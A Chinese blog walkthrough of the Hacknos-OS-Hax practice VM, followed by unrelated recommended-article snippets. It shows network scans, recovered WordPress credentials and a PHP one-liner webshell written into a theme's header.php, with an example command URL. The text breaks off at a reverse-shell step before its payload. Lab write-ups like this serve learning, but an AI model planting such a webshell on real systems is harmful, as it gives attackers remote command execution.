Hacknos-OS-Hax打靶渗透

最新推荐文章于 2024-07-28 23:54:43 发布
最新推荐文章于 2024-07-28 23:54:43 发布
阅读量297 收藏 5
点赞数 7
文章标签: 网络 web安全 网络安全 经验分享 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/140420757
版权

一、信息收集

步骤一:主机发现:

nmap 192.168.7.0/24

步骤二:端口扫描:

nmap -p- 192.168.7.44

开放了两个端口

步骤三:访问80端口:

页面几乎没有功能点。

步骤四:目录扫描:

dirsearch -u http://192.168.7.44

步骤五:拼接目录,查看页面:

发现几乎页面是乱码,需要进行host替换。

在第一个页面发现有一个web用户。

步骤六:在img目录下有一个 flaghost.png 图片,使用strings命令与exiftool工具查询flaghost.png中的关键字...发现存在passw@45字符串

尝试登录 web:passw@45,登录失败。

步骤七:尝试进行路径拼接...发现路径下的文件....flag2.txt文件是一段加密值使用以下站点进行解密...得出web:Hacker@4514到wordpress后台登录...成功!

二、GetShell

步骤八:在后台主题位置可以写木马。点击Appearance-->Theme Editor-->header.php写入一句话木马

<?php system($_REQUEST['z4pts']);?>  //写入木马
http://192.168.1.226/wordpress/?z4pts=id   //木马利用姿势

步骤九、使用BP抓取请求数据包并将数据包修改为POST请求,修改z4pts的值为以下反弹shell的语法并在Kali攻击机上使用nc监听本地4444端口接收shell反弹:

搬砖小星
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Schlauer-Hax
03-17
你好呀! :hourglass_not_done: {████████████████░░░░░░░░░░░░░░}-55.07%-月进度 :hourglass_not_done: {██████░░░░░░░░░░░░░░░░░░░░░░░░}-20.69...
XF86Config-hax-开源
05-03
标题中的“XF86Config-hax-开源”表明这是一个与开源相关的项目,主要涉及X Window系统中的XF86Config配置文件。在X Window系统中,XF86Config(或者在某些较新版本中称为xorg.conf)是控制图形适配器(即显卡)和...
Hax264-开源
05-09
Hax264是一款专为Microsoft Windows平台设计的开源DirectShow视频转换筛选器,其主要功能在于解码高质量的H264(Advanced Video Coding,简称AVC)视频流。DirectShow是微软开发的一种多媒体框架,它允许应用程序...
haxm-windows_v7_5_4.zip
12-26
标签 "haxm-windows" 和 "hax" 强调了这与Intel HAXM在Windows平台上的安装和使用有关,而"HAX"是HAXM的缩写。 压缩包内的文件包含: 1. **silent_install.bat**:这是一个批处理文件,用于无用户交互的自动安装...
Steak-Hax:TDC制造的Minecraft骇客客户端
03-07
牛排骗局 网站: : (会添加很多东西) 什么是牛排骗局? Catch-21是Minecraft 1.8被黑的客户端! ... 对于旧版本,请 推荐的纹理包 , Windows: 要进行安装,请按WINDOWKEY + R并在其中粘贴%appdata%/。...
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 294
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
S5730举例
jjjxxxhhh123的博客
07-27 766
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
使用WebSocket协议调用群发方法将消息返回客户端页面
2302_79840586的博客
07-27 924
使用WebSocket协议调用群发方法将消息返回客户端页面
【计算机网络OSPF单区域实验
m0_65787507的博客
07-26 902
DR和BDR是由同一网段中所有的路由器根据路由优先级和Router ID通过Hello报文选举出来的,只有优先级大于0的路由器才具有选举资格。进行DR/BDR选举时每台路由器将自己选出的DR写入Hello报文中,发给网段上的每台运行OSPF协议的路由器。如果DR或BDR失效,或者有新的路由器加入网络并希望成为DR或BDR,那么它们将参与新的选举过程。4:非DR路由器将自己的LSA发送给DR,然后DR将这些LSA泛洪到整个区域,使所有路由器获得一致的LSDB,从而确保区域内路由器都能计算出相同的最短路径树。
使用 WebSocket 实现实时聊天
最新发布
weixin_44976692的博客
07-28 313
在现代网络应用中,实时聊天功能已经成为用户体验的重要组成部分。无论是社交媒体平台、在线客服系统还是多人在线游戏,实时聊天功能都为用户提供了即时沟通的便利。实现实时聊天的技术有很多种,其中 WebSocket 是最受欢迎和高效的解决方案之一。本文将介绍如何使用 WebSocket 实现一个简单的实时聊天应用,包括 WebSocket 的基本概念、服务端和客户端的实现、以及一些可能的优化和扩展。WebSocket 是一种在单个 TCP 连接上进行全双工、双向交互的协议。
通信原理-思科实验五:家庭终端以太网接入Internet实验
sinat_39522506的博客
07-24 392
实验五 家庭终端以太网接入Internet实验。接着配置IP地址池和虚拟模板 开启宽带拨号。1.按照上图选择对应的设备,并连接起来。5.为路由器R1配置静态路由项。7.完成终端PC2 IP配置。
Hyperledger Fabric 网络体验 - 网络启动过程概览
ALONG的博客
07-25 485
作为第一次Fabric网络体验,网络启动主要包含三个操作,分别是生成配置文件、启动网络和操作网络。执行完指令能看到fabric已经启动。
C#与欧姆龙PLC 通信——fins udp协议
qq_34059233的博客
07-28 54
该调试助手专门为了帮助大家学习以及测试Fins-Udp通信,下面进行详细介绍。
应用层自定义协议以及序列化和反序列化
Xpccccc的博客
07-24 1018
应用层自定义协议以及序列化和反序列化
OSPF动态路由协议实验
hello2236的博客
07-28 322
R1、R2、R5上各自配置一个环回接口。R1和R2的环回接口可以宣告到OSPF网络。一个骨干网段分成三个,r1,r2,r5三个环回网段 ,总共要四个网段。R3与R4之间使用密文认证,密码为 Admin@huawei.com。192.168.1.128/26---r2环回。192.168.1.192/26---r3环回。192.168.1.64/26---r1环回。192.168.1.0/26---骨干网段。R1和R2的环回接口可以宣告进OSPF网络。以r1为老大,r2为老二,其他全为小弟。
作业7.26~28
2201_75783063的博客
07-28 92
全双工: 通信双方 既可以发送,也可以接收数据。
探索GAN 在改善网络安全方面的作用
知来者逆的博客
07-25 619
GAN 是一类机器学习框架,由两个神经网络组成——生成器和鉴别器。这两个网络在一个动态过程中竞争,生成器创建数据样本,鉴别器对其进行评估。生成器的目标是尽可能地生成与实际样本相似的数据。而鉴别器的目标是区分真实数据和生成的数据。在训练过程中,这种对抗关系促使两个网络不断改进。生成器会改进其输出以创建更令人信服的数据,而鉴别器则会提高其检测细微差异的能力。这种竞争会产生高度逼真的数据,使得 GAN 对于需要创建合成数据和网络安全中稳健测试场景的任务非常有用。
网络学习|如何理解服务的端口号
weixin_44435110的博客
07-24 947
端口号(Port Number)是网络传输层协议(如TCP或UDP)用来识别特定服务或应用程序的数字标识符。每个IP地址可以有多个端口号,每个端口号代表不同的服务。例如,HTTP服务通常使用端口80,而HTTPS服务使用端口443。回答: 端口号是网络传输层协议用来识别特定服务或应用程序的数字标识符。端口号的存在允许同一台计算机同时运行多个网络服务,例如Web服务器和邮件服务器,区分这些服务需要不同的端口号。回答: 端口转发是将一个网络端口上的通信重定向到另一个端口的技术。
大学计算机专业主要课程及概要介绍
07-26 1363
计算机专业还包含丰富的实践教学环节,如工程训练、计算机应用基础训练、认识实习、生产实习、毕业实习、教学实验、社会实践、课程设计和毕业设计等。这些环节旨在通过实际操作和项目经验,提升学生的动手能力和解决实际问题的能力。综上所述,大学计算机专业课程设置全面且深入,旨在培养学生在计算机科学与技术领域的综合能力和创新精神。通过系统的学习和实践,学生将能够掌握计算机科学的基本理论和技术,为未来的职业发展打下坚实的基础。大学计算机专业是一门涵盖广泛领域的学科,旨在培养学生在计算机科学与技术方面的理论知识与实践能力。
[WinError 5] 拒绝访问。: 'C:\\Users\\Administrator\\AppData\\Local\\Temp\\pip-unpack-1hax6tn4\\notebook-7.0.3-py3-none-any.whl'
09-04
[WinError 5] 拒绝访问是一个错误消息,意味着你没有足够的权限来访问或操作指定的文件或目录。这个错误通常发生在你试图安装或卸载Python包时。根据引用和引用的信息,建议你尝试以下方法来解决这个问题: 1. 使用--user选项: 在安装或卸载包时,使用--user选项可以将包安装到当前用户的目录中,而不是全局目录。这通常可以避免权限问题。示例命令如下: ``` pip install package_name --user ``` 2. 检查权限: 确保你拥有足够的权限来访问指定的文件或目录。可以尝试以管理员身份运行命令提示符或终端,并使用管理员权限运行安装或卸载命令。 另外,引用提供了一些解决Python PermissionError: [WinError 5]拒绝访问问题的步骤,你也可以参考这个参考资料来解决你的问题。希望这些方法对你有所帮助。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [python更新库遇到ERROR: [WinError 5] 拒绝访问。Consider using the `--user` option or check the ...](https://blog.csdn.net/sophiasofia/article/details/129739335)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [ERROR: Could not install packages due to an OSError: [WinError 5] 拒绝访问。: ‘C:\\Users\\zlr\\App...](https://blog.csdn.net/zlrhhh/article/details/127915930)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [三步解决python PermissionError: [WinError 5]拒绝访问的情况](https://download.csdn.net/download/weixin_38557095/12852977)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值